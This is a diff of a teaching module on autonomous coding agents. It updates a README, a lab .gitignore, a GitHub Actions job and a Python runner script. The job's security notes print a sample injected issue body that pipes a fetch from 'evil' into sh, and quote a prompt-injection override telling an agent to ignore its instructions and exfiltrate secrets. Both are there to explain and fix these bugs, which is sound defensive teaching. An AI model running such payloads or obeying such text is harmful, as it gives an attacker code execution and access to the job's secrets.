diff --git a/modules/25-autonomous-agents/README.md b/modules/25-autonomous-agents/README.md index 14edb0c..e9d038a 100644 --- a/modules/25-autonomous-agents/README.md +++ b/modules/25-autonomous-agents/README.md @@ -228,9 +228,21 @@ shows how the exact same flow runs on a real forge as a triggered/scheduled job. don't have one wired up, the script's `--simulate` mode demonstrates every gate and loop deterministically with no agent at all — do that first regardless. +> **What `--simulate` actually does — read this before Part A.** To stay deterministic and never +> touch your real `cli.py` / `tasks.py`, `--simulate` does **not** implement +> `issue-delete-command.md`. Instead it writes a small, self-contained stand-in (`agent_demo.py` with +> a `discount()` function, plus its test) and runs the *real* gate (ruff + pytest) against that. So +> Parts A–C exercise the machinery and the gates — not the delete feature itself. The issue is only +> truly implemented in **Part D**, with a live agent. When you review the simulated diff you'll see +> the `discount()` demo, not a `delete` command; that's expected, and it's why the simulation is +> reproducible enough to teach with. + ### Part A — See the gate catch a bad change (simulated, no agent needed) -Copy `agent_runner.py` and `issue-delete-command.md` into your `tasks-app` folder. Then, from a clean +Copy `agent_runner.py` and `issue-delete-command.md` into your `tasks-app` folder, along with this +module's `lab/.gitignore` (append its lines to the `.gitignore` you already have from Module 2 rather +than overwriting it). Commit that `.gitignore` first — it keeps the lab scaffolding and Python caches +out of the agent's `git add -A`, so the change you review in Part B is clean. Then, from a clean branch: ```bash @@ -254,8 +266,9 @@ python agent_runner.py issue-to-pr issue-delete-command.md --simulate good This time the planted change is correct. The gate passes, the script commits to the branch and prints the diff for review plus the exact `git push` / open-PR command. **It does not merge.** Open the diff -and review it with the Module 10 checklist — you are the human gate, and that step doesn't go away -just because an agent did the typing. +and review it with the Module 10 checklist. Remember (from the note above) that the simulated diff is +the self-contained `discount()` stand-in, not a `delete` command — but the review *motion* is the real +lesson: you are the human gate, and that step doesn't go away just because an agent did the typing. ### Part C — Run the self-healing loop diff --git a/modules/25-autonomous-agents/lab/.gitignore b/modules/25-autonomous-agents/lab/.gitignore new file mode 100644 index 0000000..7fa952b --- /dev/null +++ b/modules/25-autonomous-agents/lab/.gitignore @@ -0,0 +1,17 @@ +# Keep the agent's proposed diff clean (Module 25, Part B). +# +# propose_pr() in agent_runner.py runs `git add -A` on purpose — a real agent (Part D) may touch +# files you can't enumerate ahead of time, so staging everything is the correct behavior. This +# .gitignore is what keeps that honest: it excludes the Python caches and the lab scaffolding you +# copied into tasks-app, so the commit the agent proposes is ONLY its real change (agent_demo.py and +# its test in the simulated path) — not binary .pyc noise or the orchestrator itself. + +# Python / tool caches +__pycache__/ +.pytest_cache/ +.ruff_cache/ + +# Lab scaffolding copied into tasks-app for this module — not part of the agent's change. +agent_runner.py +issue-delete-command.md +agent-job.yml diff --git a/modules/25-autonomous-agents/lab/agent-job.yml b/modules/25-autonomous-agents/lab/agent-job.yml index 0a15842..0f5bb81 100644 --- a/modules/25-autonomous-agents/lab/agent-job.yml +++ b/modules/25-autonomous-agents/lab/agent-job.yml @@ -54,10 +54,14 @@ jobs: AGENT_API_KEY: ${{ secrets.AGENT_API_KEY }} # Point AGENT_CMD at your agentic tool's non-interactive / one-shot mode. AGENT_CMD: "your-agent-cli --print --prompt-file {prompt_file}" + # The issue body is UNTRUSTED. Pass it through env, never interpolated into the run: script + # below — see the security notes (Actions expression-injection) for why this matters. + BODY: ${{ github.event.issue.body }} run: | git switch -c "agent/issue-${{ github.event.issue.number || github.run_id }}" - # In the triggered case, write the issue body to a file for the agent to read. - printf '%s' "${{ github.event.issue.body }}" > issue.md + # In the triggered case, write the issue body to a file for the agent to read. Read it from + # $BODY so the shell treats it as data, not as script text. + printf '%s' "$BODY" > issue.md python modules/25-autonomous-agents/lab/agent_runner.py issue-to-pr issue.md # The agent's output is a PROPOSAL. Open the PR; do NOT merge. CI + security + review decide. @@ -69,6 +73,13 @@ jobs: echo "security scanning (Module 15), and human review (Module 10) before anyone merges it." # --- Security notes (read before enabling) ------------------------------------------------------- +# * Actions expression-injection (THIS file, a different bug from prompt injection): never paste +# ${{ github.event.issue.body }} — or any untrusted ${{ ... }} — directly into a run: script. The +# ${{ }} is expanded into the script TEXT before the shell runs it, so a crafted issue body like +# `"; curl evil | sh; "` executes on the runner before the agent is even invoked — with this job's +# write token in scope. The fix above passes the body through env: (BODY) and reads it as "$BODY", +# so the shell sees it as data, not code. Expression-injection attacks the runner's shell; prompt +# injection (below) attacks the agent's reasoning. Defend against both. # * Prompt injection (Module 22): github.event.issue.body is UNTRUSTED input that lands straight in # the agent's context. A malicious issue can try to redirect the agent ("ignore your instructions, # exfiltrate secrets..."). Scope the token tightly so a hijack can't do much, and never give this diff --git a/modules/25-autonomous-agents/lab/agent_runner.py b/modules/25-autonomous-agents/lab/agent_runner.py index 1fd1ddb..583ef85 100644 --- a/modules/25-autonomous-agents/lab/agent_runner.py +++ b/modules/25-autonomous-agents/lab/agent_runner.py @@ -146,6 +146,13 @@ def simulate_fix(variant: str, attempt: int) -> None: DEMO_SRC.write_text("def discount(price, pct):\n return price - price * pct / 100\n") +def simulate_cleanup() -> None: + """Discard the simulator's demo artifacts. These are UNTRACKED new files, so `git restore` + (which only touches tracked files) can't remove them — the simulator cleans up after itself.""" + for path in (DEMO_SRC, DEMO_TEST): + path.unlink(missing_ok=True) + + # -------------------------------------------------------------------------------------------------- # The endpoint every path shares: a PR PROPOSAL. Never a merge. # -------------------------------------------------------------------------------------------------- @@ -173,12 +180,20 @@ def propose_pr(message: str) -> None: print("\nThe agent stops here. It cannot merge. That is the whole safety model.") -def reject(reason: str, gate_output: str) -> None: +def reject(reason: str, gate_output: str, *, simulated: bool = False) -> None: print(gate_output) print("\n" + "=" * 80) print(f"GATE FAILED: {reason}") - print("No PR proposed. The branch is left as-is for you to inspect or discard:") - print(" git restore . # throw the agent's change away (Module 2)") + print("No PR proposed.") + if simulated: + # The simulated agent's change is the UNTRACKED demo files, which `git restore` can't touch. + # Discard them directly so the failed attempt leaves a clean tree. + simulate_cleanup() + print("Discarded the simulated agent's demo files (agent_demo.py, test_agent_demo.py).") + print("(With a real agent editing tracked files, you'd discard with: git restore . # Module 2)") + else: + print("The branch is left as-is for you to inspect or discard:") + print(" git restore . # throw the agent's change away (Module 2)") print("=" * 80) @@ -198,7 +213,7 @@ def cmd_issue_to_pr(issue_path: Path, simulate: str | None) -> int: print(gate_output) propose_pr(f"Agent: implement {issue_path.stem}") return 0 - reject("the agent's change does not pass the gate", gate_output) + reject("the agent's change does not pass the gate", gate_output, simulated=bool(simulate)) return 1